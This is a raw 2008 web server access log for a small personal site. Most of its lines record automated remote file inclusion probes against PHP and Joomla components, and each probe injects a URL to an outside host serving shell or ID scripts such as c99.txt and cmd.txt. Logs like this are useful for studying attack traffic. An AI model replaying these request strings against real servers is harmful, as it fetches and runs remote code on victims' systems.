81.31.157.8 - - [13/Mar/2008:07:26:29 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.kampeermarkt.com/php_content/shop/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:07:28:03 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://justinpta.org/calogic122/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.235.253.6 - - [13/Mar/2008:07:29:06 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.134.186 - - [13/Mar/2008:07:29:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.134.186 - - [13/Mar/2008:07:29:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:30:20 -0700] "GET /logs/access_080122.log/atom.php5?page=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:30:20 -0700] "GET /atom.php5?page=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:30:21 -0700] "GET /logs/atom.php5?page=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.157.8 - - [13/Mar/2008:07:31:19 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.kampeermarkt.com/php_content/shop/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.31.44 - - [13/Mar/2008:07:31:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.125 - - [13/Mar/2008:07:31:58 -0700] "GET /logs/access_070704.log HTTP/1.0" 200 11515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:33:25 -0700] "GET /logs/access.log/atom.php5?page=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.162.147.212 - - [13/Mar/2008:07:34:11 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.93.153.161 - - [13/Mar/2008:07:34:26 -0700] "GET /megumi/Necklace/1_Turquoise_Sterling_Silver_Set_Green_75.JPG HTTP/1.1" 200 393216 "http://image-search.yahoo.co.jp/search?p=megumi&ei=&b=56&dim=large&atview=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:07:35:42 -0700] "GET /logs/access_071220.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:07:35:42 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:07:35:42 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:07:36:11 -0700] "GET /logs/access_071212.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:07:36:35 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:36:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:36:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:36:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:36:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:38:40 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:38:45 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
67.195.44.108 - - [13/Mar/2008:07:40:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [13/Mar/2008:07:41:04 -0700] "GET /logs/access.log HTTP/1.0" 200 56065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.20.57.43 - - [13/Mar/2008:07:41:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.225.50 - - [13/Mar/2008:07:42:29 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
75.125.225.50 - - [13/Mar/2008:07:42:29 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:07:42:31 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:07:42:31 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.218 - - [13/Mar/2008:07:42:51 -0700] "GET //calendar.php?action=1&vwar_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:07:44:11 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.93.153.161 - - [13/Mar/2008:07:44:46 -0700] "GET /megumi/Necklace/23_Olive_Jade_Sterling_Silver_25.JPG HTTP/1.1" 200 524288 "http://image-search.yahoo.co.jp/search?p=megumi&ei=&b=66&dim=large&" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)" "www.dmulk.com"
82.98.141.70 - - [13/Mar/2008:07:45:56 -0700] "GET /spaw/spaw_control.class.php?spaw_root=http://bid.e7studio.net/wc103/docs/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.98.141.70 - - [13/Mar/2008:07:45:56 -0700] "GET /logs/spaw/spaw_control.class.php?spaw_root=http://bid.e7studio.net/wc103/docs/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
81.169.134.54 - - [13/Mar/2008:07:45:59 -0700] "GET /2http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.169.134.54 - - [13/Mar/2008:07:45:59 -0700] "GET /logs/2http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
75.125.225.50 - - [13/Mar/2008:07:46:32 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
75.125.225.50 - - [13/Mar/2008:07:46:32 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:47:53 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:47:53 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:47:53 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.134.54 - - [13/Mar/2008:07:47:58 -0700] "GET /logs/2http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.169.134.54 - - [13/Mar/2008:07:47:58 -0700] "GET /2http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:07:48:49 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:07:48:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:07:48:51 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:49:48 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:49:48 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:49:48 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:49:48 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:07:50:01 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:50:47 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.76.93 - - [13/Mar/2008:07:50:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "mediohbot" "dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:51:54 -0700] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.187.21.177 - - [13/Mar/2008:07:52:07 -0700] "GET /megumi/Necklace/23_Olive_Jade_Sterling_Silver_25.JPG HTTP/1.1" 200 2288693 "http://image-search.yahoo.co.jp/search?p=megumi&ei=&dim=large&b=66" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:52:10 -0700] "GET /logs/access_080215.log//login.php?dir=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:52:11 -0700] "GET //login.php?dir=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:52:11 -0700] "GET /logs//login.php?dir=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:07:52:42 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:07:52:43 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:07:53:30 -0700] "GET /index.php?incl=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:07:53:45 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://justinpta.org/calogic122/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:53:50 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:53:55 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
202.174.84.65 - - [13/Mar/2008:07:54:42 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:54:46 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:54:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:54:50 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [13/Mar/2008:07:55:58 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.chyna.sufx.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:07:56:56 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [13/Mar/2008:07:57:10 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://albinfo.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [13/Mar/2008:07:57:10 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://albinfo.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [13/Mar/2008:07:57:10 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://albinfo.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [13/Mar/2008:07:57:12 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://albinfo.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:57:50 -0700] "GET /logs/access_080126.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.30.214.234 - - [13/Mar/2008:07:59:10 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.22.204.47 - - [13/Mar/2008:08:00:01 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.chyna.sufx.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [13/Mar/2008:08:00:01 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.chyna.sufx.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [13/Mar/2008:08:00:01 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.chyna.sufx.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [13/Mar/2008:08:00:03 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.chyna.sufx.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.202 - - [13/Mar/2008:08:00:08 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.214.233 - - [13/Mar/2008:08:00:08 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.221.130 - - [13/Mar/2008:08:00:34 -0700] "GET /logs/access_080211.log//index.php?sub=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [13/Mar/2008:08:00:34 -0700] "GET //index.php?sub=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [13/Mar/2008:08:00:35 -0700] "GET /logs//index.php?sub=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:08:01:03 -0700] "GET /logs/access_080117.log//login.php?dir=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [13/Mar/2008:08:01:26 -0700] "GET /logs/access_080201.log//calendar.php?action=1&vwar_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [13/Mar/2008:08:01:26 -0700] "GET /logs//calendar.php?action=1&vwar_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.162.147.212 - - [13/Mar/2008:08:01:54 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.162.147.212 - - [13/Mar/2008:08:01:54 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:08:02:28 -0700] "GET /logs/access_080204.log/index.php?incl=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:08:02:28 -0700] "GET /logs/index.php?incl=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.57.43 - - [13/Mar/2008:08:02:42 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [13/Mar/2008:08:02:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:03:33 -0700] "GET /logs/access_080215.log/xGB.php?act=admin&do=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:03:35 -0700] "GET /xGB.php?act=admin&do=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:03:36 -0700] "GET /logs/xGB.php?act=admin&do=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.20.57.43 - - [13/Mar/2008:08:03:47 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.221.130 - - [13/Mar/2008:08:03:49 -0700] "GET /logs/access_080124.log//index.php?sub=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.30.169 - - [13/Mar/2008:08:03:54 -0700] "GET /bikes/cb750K6/ HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:04:05 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:04:05 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:04:06 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:08:04:56 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:08:04:57 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.95 - - [13/Mar/2008:08:05:03 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
